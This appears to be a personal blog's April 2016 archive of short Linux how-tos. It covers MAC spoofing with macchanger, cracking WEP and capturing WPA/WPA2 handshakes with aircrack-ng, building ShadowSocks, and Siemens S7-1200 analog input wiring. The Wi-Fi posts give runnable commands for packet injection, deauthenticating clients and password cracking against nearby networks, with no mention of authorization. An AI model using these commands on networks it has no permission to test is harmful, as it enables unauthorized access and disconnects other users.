Monthly Archives: April 2016

Change mac address with macchanger in Kali

original mac address:

ifconfig eth0

Turn off your network interface:

ifconfig eth0 down

Use macchanger to randomly generate new MAC address and assign it to eth0 network interface:

macchanger -r eth0
ifconfig eth0 up

If for example a specific MAC address is required use macchanger as follows:

macchanger -m b2:aa:0e:56:ed:f7 eth0

References :
https://linuxconfig.org/change-mac-address-with-macchanger-linux-command

Hack WEP Wi-Fi With Kali Linux & Aircrack-ng

list all of the wireless cards that support monitor (not injection) mode :

airmon-ng

put interface on monitor mode :

airmon-ng start [wifi interface name]
airmon-ng start wlan0

list all of the wireless networks in your area :

airodump-ng [monitor interface name]
airodump-ng mon0

WEP encrypted data packets needs to be captured :

airodump-ng -w [file name] -c [chanel name] --bssid [bssid] [monitor interface name]
airodump-ng -w /root/Desktop/hack01 -c 1 --bssid 78:54:2E:D6:9F:D5 wlan1mon

To speed up the IV’s open a third terminal window letting the second run capturing the data :

aireplay-ng -1 0 -a [bssid] [monitor interface name]
aireplay-ng -1 0 -a 78:54:2E:D6:9F:D5 wlan1mon

This will begin sending out ARP request and the data and the beacons should begin to grow quickly :

aireplay-ng -3 -b [bssid] [monitor interface name]
aireplay-ng -3 -b 78:54:2E:D6:9F:D5 wlan1mon

after collecting enough data (20000 is enough but 100000 is better) :

aircrack-ng [file name]
aircrack-ng hack01.cap

References :
http://www.wirelesshack.org/step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html

Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

list all of the wireless cards that support monitor (not injection) mode :

airmon-ng

put interface on monitor mode :

airmon-ng start [wifi interface name]
airmon-ng start wlan0

list all of the wireless networks in your area :

airodump-ng [monitor interface name]
airodump-ng mon0

save any intercepted 4-way handshakes to file(necessary to crack the password) :

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

force client to deauthentication to capture password faster :

aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
aireplay-ng -0 2 -a 00:14:BF:E0:E8:D5 -c 4C:EB:42:59:DE:31 mon0

References :
http://lewiscomputerhowto.blogspot.co.uk/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html

Install ShadowSocks on Linux from Source

sudo apt-get install qt5-qmake qtbase5-dev libbotan1.10-dev #skip this part if you've already installed these packages
dpkg-buildpackage -uc -us -b
sudo apt-get install qt5-qmake qtbase5-dev libqrencode-dev libqtshadowsocks-dev libappindicator-dev libzbar-dev libbotan1.10-dev
dpkg-buildpackage -uc -us -b

References :
https://github.com/shadowsocks/libQtShadowsocks/wiki/Installation
https://github.com/shadowsocks/shadowsocks-qt5/wiki/Installation

https://github.com/shadowsocks/libQtShadowsocks/wiki/Compiling
https://github.com/shadowsocks/shadowsocks-qt5/wiki/Compiling

How can the CPU analog inputs of the SIMATIC S7-1200 also measure currents of 0-20mA

s7-1200_cpu_analoginputs_current_01

Fig. 01: Connection of a sensor to a voltage source as a 2-conductor connection

s7-1200_cpu_analoginputs_current_02

Fig. 02: Connection of a sensor to a voltage source as a 3-conductor connection

s7-1200_cpu_analoginputs_current_03

Fig. 03: Connection of a sensor to a voltage source as a 4-conductor connection

s7-1200_cpu_analoginputs_current_04

Fig. 04: Connection of a measuring transducer with voltage output to a current source as a 4-conductor connection

References :
https://support.industry.siemens.com/cs/document/67396370/how-can-the-cpu-analog-inputs-of-the-simatic-s7-1200-also-measure-currents-of-0-20ma?dti=0&lc=en-WW